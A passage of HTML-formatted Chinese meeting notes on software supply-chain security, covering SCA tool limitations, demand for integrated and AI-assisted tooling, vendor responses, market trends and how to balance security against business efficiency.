style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">:</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">安全平行切面，和</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">RASP</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">有关系么？还是安全平行切面的前身是</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">RASP? </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">答：</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">RASP是安全平行切面的一个应用</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">}</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">          <o:p> </o:p></span></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">5 </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">供应链安全工具的发展与需求</span></p><p><span style="color: rgb(255, 0, 0);"><span style="font-size: 12pt;font-family: Calibri;font-variant: normal;text-transform: none;">SCA</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;">只能满足最低的一个管控要求</span></span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">，单个工具的的安全能力都有自己的强项和劣势，所以说是各个工具的综合利用才能发挥最大的作用。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">5.1 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">核心诉求</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 核心诉求:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">工具自身的能力需要这个低误报、更精准、快速反馈</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">工具要联动，包括安全检测的编排、漏洞的交叉验证、漏洞的优先级</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">工具的自动化能力，比如说减少人工的干预，能够自动化 AI 提示</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">现状：单个有提高空间，</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">综合联动</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">比较差。总结的太好了！</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">          <o:p> </o:p></span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 厂商的应对:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 平台实现工具链联动:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>除SCA外,还有代码审计、IAST、DAST等多种应用安全检测技术</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>通过平台将各种工具进行联动</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> - AI能力沉淀:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>结合AI做场景融合</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>智能化漏洞修复推荐</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>智能化漏洞可达性分析</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> - 一站式安全解决方案:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>认识到用户希望</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">一站式</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">解决方案,而非</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">多个产品组装</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">  </span>-<span style="mso-spacerun:yes;"> </span>强调自身在供应链安全方面的全面能力</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 总的来说,厂商表示理解用户诉求,并从工具联动、AI应用和一站式解决方案等方面给出了自身的应对措施和优势。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">          <o:p> </o:p></span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">5.2 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">用户体验</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 1. 市场现状:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>SCA领域已经有了显著发展，不再是刚起步的阶段。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>大型企业客户对SCA产品已经相当熟悉，应用范围广泛。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>市场竞争激烈，客户同时试用多家产品。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 未来发展方向:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>a)<span style="mso-spacerun:yes;"> </span>技术提升:</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>提高源码、二进制、运行时三个技术领域的</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">上限</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。{怒赞！<img data-ratio="1" data-w="128" style="display: inline-block;width: 20px;vertical-align: middle;background-size: cover;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=34c2798b&amp;u=https%3A%2F%2Fres.wx.qq.com%2Ft%2Fwx_fed%2Fwe-emoji%2Fres%2Fv1.3.10%2Fassets%2FExpression%2FExpression_80%402x.png"/>}</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>提升组件库的准确性。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> <span style="mso-spacerun:yes;">   </span>b) 漏洞库和知识库完善: 【这部分需要买，也可以逆向采集】</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>重视漏洞库和知识库的运营。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>逐步完善和扩充相关数据。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> <span style="mso-spacerun:yes;">   </span>c) 结合AI技术:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>智能化识别和分析：利用AI提高组件识别的准确性。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>自动化风险评估：结合历史漏洞记录、安全公告、社区反馈等多维度数据。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">      </span>-<span style="mso-spacerun:yes;"> </span>智能推荐和自动化修复：AI辅助替换组件、优化代码结构，减轻开发人员负担。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;background:#FF00FF;mso-highlight:#FF00FF;">【思】甲方不应该仅仅满足于&#34;搭积木&#34;和&#34;买东西&#34;，甲方也应该在技术发展方面有所思考和参与</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">5.3 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">业务影响和平衡</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">安全对业务的影响:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 安全产品可能会影响业务效率,尤其是开发和运营速度。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 实施安全措施可能会导致系统变慢。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 发现大量待修复的软件和漏洞会给一线人员带来额外工作负担。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 应对策略:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 先易后难:先从软件成分分析(SCA)入手,摸清&#34;家底&#34;,再考虑全面的工具和漏洞整改。</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 抓大放小:优先处理互联网资产暴露面的高危和超危漏洞。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 步步为营:充分利用现有平台(如CI/CD、DevOps),接入SCA SaaS服务。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 采用合规驱动的方式,推荐小步快跑的敏捷模式。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 选择最适合企业特点的定制化工具,提高效率。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 在选型时要结合自身特点,避免踩坑。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 总的来说,建议采取循序渐进的方法,优先处理</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">关键问题</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">,并选择适合企业需求的工具,以平衡安全需求和业务效率。</span></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">6 </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">未来趋势和展望</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">6.1 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">甲方观点看安全产品</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">演进</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"><span style="mso-spacerun:yes;"> </span>&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">拳套</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">→</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 